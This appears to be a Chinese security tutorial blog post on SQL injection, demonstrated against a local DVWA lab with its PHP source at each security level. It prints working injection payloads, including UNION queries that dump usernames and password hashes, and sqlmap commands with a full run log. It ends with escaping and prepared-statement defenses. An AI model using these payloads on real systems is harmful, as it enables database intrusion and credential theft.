算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御

最新推荐文章于 2024-05-12 12:01:50 发布
最新推荐文章于 2024-05-12 12:01:50 发布
阅读量1.6k 收藏 10
点赞数 2
分类专栏: 计算机网络 文章标签: 数据库 web安全 sql sql注入漏洞 网络安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46838716/article/details/129319843
版权

算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御

2022找工作是学历、能力和运气的超强结合体,遇到寒冬,大厂不招人,可能很多算法学生都得去找开发,测开
测开的话,你就得学数据库,sql,oracle,尤其sql要学,当然,像很多金融企业、安全机构啥的,他们必须要用oracle数据库
这oracle比sql安全,强大多了,所以你需要学习,最重要的,你要是考网络警察公务员,这玩意你不会就别去报名了,耽误时间!
考网警特招必然要考操作系统,计算机网络,计算机网络安全基础知识,由于备考时间不长,你可能需要速成,我就想办法自学速成了,课程太长没法玩
在这里插入图片描述
系列文章:
【1】计算机网络安全基础知识1:渗透测试,网络连接的核心TCP/IP体系结构,公网,内网,ip地址和端口
【2】计算机网络安全基础知识2:http超文本传输协议,请求request消息的get和post,响应response消息的格式,响应状态码
【3】计算机网络安全基础知识3:网站漏洞,安装phpstudy,安装靶场漏洞DVWA,搭建一个网站
【4】计算机网络安全基础知识4:命令执行漏洞,危害极大,DVWA演示命令注入漏洞攻击网站,防御命令注入执行漏洞,low,medium,high,impossible

文章目录

计算机网络安全基础知识:sql注入漏洞攻击

千万别对正常互联网的网站发起攻击,这是违法犯罪哦!!!!!
在这里插入图片描述
在这里插入图片描述
sql注入漏洞
下面慢慢解释
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

SQL是数据库语言
操作数据库的
任何技术,前端展示,后端存储,都会调用数据库
用sql语言来搞

在这里插入图片描述
这课程我在oracle数据库系列课程中讲得很清楚了,有兴趣看看
不学也行
随你

sql注入漏洞被攻击的过程

咱们平时访问美团啥的,数据都是在他们数据库中,你访问可以查看
在这里插入图片描述
这跟命令注入类似
这里只不过不是PHP
这里是sql语言实现的
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这是sql语句,骚操作,我不多说,你反正知道它就是查询叫长津湖的电影票房

咱们加入排序结果的语句
在这里插入图片描述
相当于你可以往命令里面注入sql新语句
这就是sql注入,如果这个命令非常恐怖,那???????????gggg

在这里插入图片描述

即,能改变原有sql语句的漏洞,就是sql注入漏洞

DVWA演示sql注入漏洞,判断是否存在sql注入漏洞

在这里插入图片描述
先设置安全级别low
在这里插入图片描述
这时,你可以模拟攻击了
咱们输入

看看源代码
在这里插入图片描述

SQL Injection Source
vulnerabilities/sqli/source/low.php
<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;

            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    } 
}

?>

核心就是这:

// Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

含义:查询users表中,id的姓名

这就是后台的代码了
我们简单这么写,更改sql语句
在这里插入图片描述

// Check database
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#;
判断1是否等于1吗?,true,肯定对的

在这里插入图片描述
#得目的是删除后续的字符
懂?

好,你这个and之后1=1就是黑客注入的sql语句了

我们去看看攻击

1' and 1=1#

在这里插入图片描述
再来改

1' and 1=2#

当1=2时,不成功,没有返回的
说明什么???
黑客利用这个漏洞,真的改了这个语句了,你咋找都没有结果,是不是很狗????
在这里插入图片描述
在这里插入图片描述
刚刚的骚操作,就意味着存在sql注入
懂????

因为你的sql代码可以被黑客修改,屌了吧???

怎么样去利用sql注入漏洞

在这里插入图片描述

1' order by 1#

在这里插入图片描述

1' order by 2#

在这里插入图片描述

1' order by 3#

在这里插入图片描述
你发现通过这种order by,看看是不是能把第一列,第二列,第n列给排序
这样就能查出数据库,它只存在两个列
没有别的列了哦

懂????
在这里插入图片描述
在这里插入图片描述
加这句话

1' union select user(),database()#

在这里插入图片描述
俩结果
分别是俩函数的

root@localhost是**user()的结果,返回了,当前连接了root用户
dvwa是database()**的结果,证明当前网站连接的数据库名字是dvwa

懂?

这很简单的,利用sql注入,可以查询用户名和数据库名字

咱还能查它有哪些表格
在这里插入图片描述
在这里插入图片描述

1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#

information_schema保存了数据库的名称,和数据库的表名称

在这里插入图片描述
貌似我这失败了,难道DVWA它改了吗?????

干脆直接读取user表算了
据说是出现了俩
在这里插入图片描述

在这里插入图片描述
我们就直接去搞这个users,看看它的用户私密信息

瞅瞅

1' union select user,password from users#

在这里插入图片描述
还真的能查到

在这里插入图片描述

select first_name,last_name from users where user_id='1' union select user,password from users#

成功读取了这个玩意
就上面这句话搞定
在这里插入图片描述

sqlmap把复杂的利用过程自动化利用起来

它有代码,可以帮你尝试暴力检查sql注入漏洞
你不用自己写代码

在这里插入图片描述
https://sqlmap.org/

在这里插入图片描述

然后运行它
在这里插入图片描述
在这里插入图片描述
完事咱们要运行命令去检测这个网址,带上cookie
在这里插入图片描述
cookie是
告诉sqlmap,我已经登录
按F12进入开发者模式
然后看网络,刷新重新载入记录
在这里插入图片描述
在这里插入图片描述
我一直没找到cookie
gg

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" 

-u:检测的网址url:http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#

我没找到cookie直接运行上面的命令

D:\software\phpstudy\sqlmap>python sqlmap.py -upython sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1%27+and+1%3D1%23&Submit=Submit#"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.2.22#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:02:19 /2023-03-04/

[14:02:19] [WARNING] it appears that you have provided tainted parameter values ('id=1' and 1%3D1#') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[14:02:21] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6ari01ceq6l...m6s52currv;security=impossible'). Do you want to use those [Y/n] y
[14:02:23] [INFO] testing if the target URL content is stable
[14:02:23] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] c
[14:02:28] [INFO] testing if GET parameter 'id' is dynamic
[14:02:28] [WARNING] GET parameter 'id' does not appear to be dynamic
[14:02:28] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[14:02:28] [INFO] testing for SQL injection on GET parameter 'id'
[14:02:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:02:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:02:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:02:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:02:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[14:02:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:02:29] [INFO] testing 'Generic inline queries'
[14:02:29] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:02:29] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:02:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[14:02:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:02:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:02:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[14:02:30] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[14:02:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:02:32] [WARNING] GET parameter 'id' does not seem to be injectable
[14:02:32] [INFO] testing if GET parameter 'Submit' is dynamic
[14:02:32] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[14:02:32] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[14:02:32] [INFO] testing for SQL injection on GET parameter 'Submit'
[14:02:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:02:33] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:02:33] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:02:33] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:02:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[14:02:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:02:33] [INFO] testing 'Generic inline queries'
[14:02:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:02:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:02:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[14:02:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:02:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:02:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[14:02:34] [INFO] testing 'Oracle AND time-based blind'
[14:02:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:02:34] [WARNING] GET parameter 'Submit' does not seem to be injectable
[14:02:34] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 14:02:34 /2023-03-04/

你看看
它貌似没有楼栋
不知道哦

在这里插入图片描述

python sqlmap.py -u "http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=&Submit=Submit#" --dbs

在这里插入图片描述
你想获取数据库的名字

在这里插入图片描述
-D
在这里插入图片描述
想象获取它的表名
就OK了
在这里插入图片描述
手工注入查询也行的

这个是sqlmap搞的

在这里插入图片描述
继续获取列名
在这里插入图片描述
反正你还是黑到了

在这里插入图片描述
手工注入时,加密的密码,反正
在这里插入图片描述

好,我们看

sql注入漏洞的防御

你不是执行select,后面的语句给你过滤
gg

不要输入别的sql语句
在这里插入图片描述

在这里插入图片描述
调高安全级别
在这里插入图片描述

SQL Injection Source
vulnerabilities/sqli/source/medium.php
<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Display values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

转义字符串中的特殊字符


    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

在这里插入图片描述
给每个单引号,都给加了反斜杠,骚啊

gg
这个可就不是sql语句了
你也没法注入生气了语句去注入漏洞了

还能继续解决
在这里插入图片描述

看看high呢
在这里插入图片描述
在后面改了限制

SQL Injection Source
vulnerabilities/sqli/source/high.php
<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}

?>

对sql语句进行限制,很骚啊
在这里插入图片描述
这有问题

再来看impossible
在这里插入图片描述

SQL Injection Source
vulnerabilities/sqli/source/impossible.php
<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        $id = intval ($id);
        switch ($_DVWA['SQLI_DB']) {
            case MYSQL:
                // Check the database
                $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
                $data->bindParam( ':id', $id, PDO::PARAM_INT );
                $data->execute();
                $row = $data->fetch();

                // Make sure only 1 result is returned
                if( $data->rowCount() == 1 ) {
                    // Get values
                    $first = $row[ 'first_name' ];
                    $last  = $row[ 'last_name' ];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
                break;
            case SQLITE:
                global $sqlite_db_connection;

                $stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );
                $stmt->bindValue(':id',$id,SQLITE3_INTEGER);
                $result = $stmt->execute();
                $result->finalize();
                if ($result !== false) {
                    // There is no way to get the number of rows returned
                    // This checks the number of columns (not rows) just
                    // as a precaution, but it won't stop someone dumping
                    // multiple rows and viewing them one at a time.

                    $num_columns = $result->numColumns();
                    if ($num_columns == 2) {
                        $row = $result->fetchArray();

                        // Get values
                        $first = $row[ 'first_name' ];
                        $last  = $row[ 'last_name' ];

                        // Feedback for end user
                        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                    }
                }

                break;
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

is_numeric判断是否为数字
在这里插入图片描述
PDO预处理
最后才放id
避免其他生气了语句产生
在这里插入图片描述

总结

提示:重要经验:

1)
2)学好oracle,操作系统,计算机网络,即使经济寒冬,整个测开offer绝对不是问题!同时也是你考公网络警察的必经之路。
3)笔试求AC,可以不考虑空间复杂度,但是面试既要考虑时间复杂度最优,也要考虑空间复杂度最优。

冰露可乐
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqlmap
mumuzi2的博客
02-25 386
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
sqlmap代码
qq_46648283的博客
05-20 6119
Microsoft Windows [版本 10.0.19044.1706] (c) Microsoft Corporation。保留所有权利。 D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db ___ __H__ ___ ___[)]_____ ___ ___ {1..
DVWA通过攻略之SQL注入_dvwa sql注入(1)
最新发布
2401_84968303的博客
05-12 1093
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1232
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
web渗透测试实战-SQLMAP
c_lanxiaofang的博客
05-26 8180
一、实验项目名称 web渗透测试实战-SQLMAP 二、实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用。 1、获取数据库信息数据库漏洞数据库名、数据库版本等 python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51"
渗透测试基础篇——sqlmap,nmap,burp工具使用
kreas的博客
05-31 1365
源系统向目标系统发一个 syn 请求,请求中包含一个端口号,如果目标端口开启,目标系统通过 syn/ack 来响应源系统,源系统通过 rst 响应目标系统,来断开连接。可以选择主动扫描或者被动扫描,主动扫描过程中会发送新的请求 payload 验证漏洞,被动扫描时 bp 不会重新发送请求,在已经存在的请求和应答分析。使用 FIN 进行测试,T 表示扫描过程中的时序(0-5),值越高扫描速度越快,容易被防火墙屏蔽。主动扫描:xss,http 头注入,重定向,sql 注入,命令行注入,文件遍历、
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
算机病毒与防护:SQL注入漏洞利用.ppt
06-10
使用示例-使用Sqlmap获取DVWA数据 (6)判断列名:root@kali:~# sqlmap -r /etc/url -D dvwa -T users –column 单击此处添加标题 * * * * * * * * * * * * * * * * 目录页 SQL注入漏洞利用 数据提取方式 数据提取...
sqlmap在windows上执行sql注入利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
学习之sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这篇文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞利用它们。在本实验中,我们将用sqlmapDVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3309
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
Kali渗透测试之DVWA系列(三)——SQL Injection(SQL注入
weixin_45116657的博客
08-22 2185
目录: 一、SQL注入简介: SQL注入漏洞原理 SQL注入类型 SQL注入过程 二、实验环境 三、实验步骤 安全级别:LOW 安全级别:Medium 安全级别:High 安全级别:Impossible 一、SQL注入简介 1、SQL注入漏洞原理: SQL注入漏洞原理:把SQL命令插入到Web表单提交,或输入域名,或网页提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。(即,将...
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1703
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
网络渗透测试实验3:SQL注入DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1678
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
DvwaDvwa连接phpMyAdmin,在线管理并查看Dvwa后台数据库
share something here
03-22 2310
DvwaDvwa连接phpMyAdmin,在线管理查看后台数据库登录小皮面板选中Dvwa所在的站点,点击确认安装成功后,点击管理登录查看Dvwa数据库信息 登录小皮面板 从小皮面板,进入软件管理,找到phpMyAdmin,点击安装 选中Dvwa所在的站点,点击确认 等待安装 安装成功后,点击管理 登录 进入到主界面 登录后台数据库使用的默认账号密码是root root 查看 Dvwa数据库信息 可以看到有两张表,一张是guestbook,存储的是存储型XSS部分下的留言内容。第二个users存
DVWA靶场
nidaxin的博客
01-29 2690
1.sql注入一般流程: 1)判断注入点:即判断是否存在sql注入,通常在参数后面加单引号,万能密码 2)判断查询的字段数 :order by 数字(数字从小到大,看是否报错) 3)确定回显位 4)获取信息函数: user() 获取当前用户用户 database() 获取当前数据库 version() 获取数据库版本 5)获取数据库名:1’ union select version(),database()# 6)获取表名: 1‘union select 1,table_name fro
DVWA 查看默认密码
热门推荐
ST0new的博客
04-30 2万+
前言 今天登录dvwa的时候发现密码错误,尝试了我自己常设置的密码后都没有结果,就决定去数据库查看dvwa的密码。话不多说,直接开始操作 dvwa默认密码 如果小伙伴们只需要dvwa的默认密码去登录dvwa,这里给出dvwa的默认密码 用户名 密码 admin password gordonb abc123 1337 charley pablo letmein sm...
sqlmap用法
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
dvwa sql注入 sqlmap
10-31
DVWA是一个用于演示Web应用程序安全漏洞的虚拟机,其中包括了SQL注入漏洞。而SQLMap是一款自动化的SQL注入工具,可以用于检测和利用SQL注入漏洞。在使用SQLMap进行DVWA SQL注入时,可以通过获取数据库名称、表名、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰露可乐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值